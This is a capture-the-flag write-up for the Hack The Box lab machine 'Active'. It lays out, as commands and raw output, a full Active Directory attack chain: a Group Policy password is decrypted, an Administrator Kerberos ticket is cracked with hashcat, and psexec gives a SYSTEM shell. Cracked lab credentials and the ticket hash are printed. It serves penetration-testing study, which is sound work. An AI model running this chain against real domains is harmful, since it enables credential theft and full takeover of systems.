HTB - Active
Last updated
Last updated
Used smbmap to enumerate smb and found a Group Policy config file with encrypted creds.
Decrypted the password using gpp-decrypt
Used bloodhound to enumerate the DC
Found the Administrator user was kerberostable
# Nmap 7.80 scan initiated Sat Mar 7 16:31:24 2020 as:
nmap -Pn -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49169,49171,49182 -oN nmap/Active_nmap.txt 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.085s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-07 21:33:51Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49169/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
49182/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 2m18s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-03-07T21:34:47
|_ start_date: 2020-03-07T21:19:38
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar 7 16:34:35 2020 -- 1 IP address (1 host up) scanned in 190.90 seconds
# Nmap 7.80 scan initiated Sat Mar 7 16:34:35 2020 as:
nmap -Pn -sU -oN nmap/Active.udp 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.038s latency).
Not shown: 971 closed ports
PORT STATE SERVICE
53/udp open domain
88/udp open|filtered kerberos-sec
123/udp open ntp
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
389/udp open|filtered ldap
464/udp open|filtered kpasswd5
500/udp open|filtered isakmp
2048/udp open|filtered dls-monitor
4500/udp open|filtered nat-t-ike
5355/udp open|filtered llmnr
17573/udp open|filtered unknown
28641/udp open|filtered unknown
48761/udp open|filtered unknown
49205/udp open|filtered unknown
51554/udp open|filtered unknown
51586/udp open unknown
51690/udp open unknown
51717/udp open unknown
51905/udp open unknown
51972/udp open|filtered unknown
52144/udp open unknown
52225/udp open|filtered unknown
52503/udp open unknown
53006/udp open|filtered unknown
53037/udp open|filtered unknown
53571/udp open unknown
53589/udp open unknown
53838/udp open unknown
Looks like we can read the Replication share
# smbmap -H 10.10.10.100
[+] IP: 10.10.10.100:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
Recursively listing all files using smbmap
smbmap -H 10.10.10.100 -R Replication --depth 10
# The followinf file is interesting since this usually contains Group Policy creds
.\Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\*
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 .
dr--r--r-- 0 Sat Jul 21 06:37:44 2018 ..
fr--r--r-- 533 Sat Jul 21 06:38:11 2018 Groups.xml
Downloading the file using smbmap
smbmap -H 10.10.10.100 -R Replication --depth 10 -A Groups.xml
[+] IP: 10.10.10.100:445 Name: active.htb
[+] Starting search for files matching 'Groups.xml' on share Replication.
[+] Match found! Downloading: Replication\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml Contents of the Groups.xml file
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>Decrypting the Group Policy Password using gpp-decrypt
gpp-decrypt 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ'
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
GPPstillStandingStrong2k18Attempting to access the box using those creds failed using psexec because the user can not write to any share. However the credentials are confirmed to be valid using smbmap and crackmapexec.
./bloodhound.py -d ACTIVE.HTB -u SVC_TGS -p GPPstillStandingStrong2k18 -dc 10.10.10.100 -ns 10.10.10.100 -c All # neo4j start
# bloodhoundShortest Paths from Kerberoastable Users
The above query results show that the user Administrator is Kerberoastable
/opt/impacket/examples/GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -request -dc-ip 10.10.10.100
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2018-07-30 13:17:40.656520
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$31fd0262c8c6885bb329b33dd932fdd9$0f43cac485bc0ff979f14e93cc6f7bc4d62e1537cffd190d81c8f7f3255c9780bf27a9ea2ae71c5201f476e9b86dcc35b194c9b827ac55140f3dfca465b33f01bdf6e98cf01cb9cf381af698c2e4c191d5bf5193d3f0155e2280e6d667fb02ea44a6bc786d685e6523082cf40ede148f4d46d327b6c1fb4f55d3f4f4147a83aaf4e36187b022e4652de88421273ceb082c97d3b34f8a0c4613ea66e8dc009d24859ae13f083251a49f2bb49ec292a86375651c0b9afe93ee9c64274d9c218274807dfc7c414efe9989bb20a3ace0cf7d88db63b72f5069470e90e05d4e5840c87a6cd34772d5a94b8820596a74513d4546d7d83a858dc96602bacb0ee8649304a43d8d3cf314ccbb9d5fe2fcdec2477a04de5252ae3a68f8607f0d374ab83bde264e00df4f7d8c30b207013c9efe0180f5c74af1b57e039f489dce46d79617035dae54d92dce7d7d6566c6d210f7703136e7bc4f59b306ef1e0a0ff8a495cb44e447d7fdebb4f21153ade1a4d5a6d36facafdf638d4f8ef864e2892db6fcdd168764827f566c21dc3159646e0c20b414cccbea7a65ae8357a76277ba7d10a783d4afa4d035744c513c326e2e829e8d97b778d883581650425cb77758ef20be18e4ac1e37b74d4f0a6b3d3e9b083ec6db77a23452fe34d4c7b26b99e2637909ea2ca7c61c154c336dd08c0a91341a5768cdfb84cab66c68a92c6407a9d924582690cd9c072edb05c37a3f27832864685e502ef78d8d87272077071e3734feaff892e9294bf0b1efb23f02f10e52d57bf11924b6014f67f177644e0c9da734b440e8c5d74c03ec139cd39de0bb11038cb12e8698652075cd11d36942f3ae8738a07a3808e9da515b94c2cf06bd0811392001808b26323619d54360a21e984f44b366cf5c44740e5b51b8471aa1f76c94281c9df2697a943f938430815567639404c0fcfb66fa5dd2fb0f2642c042caad24a6853d2533985e44f0e74bae84b3d45074d008d0d9070d4bd9ca7c36c9371c805f39d9f3ec1232a98be2d3bc59d58f28c6834c25f8dc809ecea255b3b06a9fa57b58e74dd2145e889f948d6a5196b58f093620b3891ce1687724245c9e652115095d4655df119619becf7216086eb096ff8bcaf53e1672b29b1916d6957d7b041eae2963658a10d9fa36273df0bf8802644cc862ec33a4a4b21eb753bb1649cd5d7592438dfeca872d9cdcbbbae9c4ba1854443db9f0f000f47afa55bf00c502c3e6e8a2edd0aeb6783e I use a windows box with nice GPUs to crack hashcat... It's way faster than using the Kali VM
# hashcat -m 13100 admin.hash rockyou.txt
Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$31fd0262c8c6885bb329b33dd932fdd9$0f43cac485bc0ff979f14e93cc6f7bc4d62e1537cffd190d81c8f7f3255c9780bf27a9ea2ae71c5201f476e9b86dcc35b194c9b827ac55140f3dfca465b33f01bdf6e98cf01cb9cf381af698c2e4c191d5bf5193d3f0155e2280e6d667fb02ea44a6bc786d685e6523082cf40ede148f4d46d327b6c1fb4f55d3f4f4147a83aaf4e36187b022e4652de88421273ceb082c97d3b34f8a0c4613ea66e8dc009d24859ae13f083251a49f2bb49ec292a86375651c0b9afe93ee9c64274d9c218274807dfc7c414efe9989bb20a3ace0cf7d88db63b72f5069470e90e05d4e5840c87a6cd34772d5a94b8820596a74513d4546d7d83a858dc96602bacb0ee8649304a43d8d3cf314ccbb9d5fe2fcdec2477a04de5252ae3a68f8607f0d374ab83bde264e00df4f7d8c30b207013c9efe0180f5c74af1b57e039f489dce46d79617035dae54d92dce7d7d6566c6d210f7703136e7bc4f59b306ef1e0a0ff8a495cb44e447d7fdebb4f21153ade1a4d5a6d36facafdf638d4f8ef864e2892db6fcdd168764827f566c21dc3159646e0c20b414cccbea7a65ae8357a76277ba7d10a783d4afa4d035744c513c326e2e829e8d97b778d883581650425cb77758ef20be18e4ac1e37b74d4f0a6b3d3e9b083ec6db77a23452fe34d4c7b26b99e2637909ea2ca7c61c154c336dd08c0a91341a5768cdfb84cab66c68a92c6407a9d924582690cd9c072edb05c37a3f27832864685e502ef78d8d87272077071e3734feaff892e9294bf0b1efb23f02f10e52d57bf11924b6014f67f177644e0c9da734b440e8c5d74c03ec139cd39de0bb11038cb12e8698652075cd11d36942f3ae8738a07a3808e9da515b94c2cf06bd0811392001808b26323619d54360a21e984f44b366cf5c44740e5b51b8471aa1f76c94281c9df2697a943f938430815567639404c0fcfb66fa5dd2fb0f2642c042caad24a6853d2533985e44f0e74bae84b3d45074d008d0d9070d4bd9ca7c36c9371c805f39d9f3ec1232a98be2d3bc59d58f28c6834c25f8dc809ecea255b3b06a9fa57b58e74dd2145e889f948d6a5196b58f093620b3891ce1687724245c9e652115095d4655df119619becf7216086eb096ff8bcaf53e1672b29b1916d6957d7b041eae2963658a10d9fa36273df0bf8802644cc862ec33a4a4b21eb753bb1649cd5d7592438dfeca872d9cdcbbbae9c4ba1854443db9f0f000f47afa55bf00c502c3e6e8a2edd0aeb6783e
#Password
Ticketmaster1968
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 TGS-REP etype 23
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4...b6783e
Time.Started.....: Sun Mar 08 01:32:02 2020 (2 secs)
Time.Estimated...: Sun Mar 08 01:32:04 2020 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 6493.5 kH/s (5.50ms) @ Accel:256 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10616832/14344385 (74.01%)
Rejected.........: 0/10616832 (0.00%)
Restore.Point....: 10223616/14344385 (71.27%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: alisonodonnell1 -> Saboka54
Hardware.Mon.#1..: Temp: 57c Util: 33% Core:1860MHz Mem:6000MHz Bus:16Root Flag
psexec.py active.htb/administrator:Ticketmaster1968@10.10.10.100
Impacket v0.9.21.dev1+20200225.153700.afe746d2 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file rshcyaJN.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service plcS on 10.10.10.100.....
[*] Starting service plcS.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.10.100
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{B3FEC2C7-47CA-4014-A441-A3A5CDDC983C}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Windows\system32>
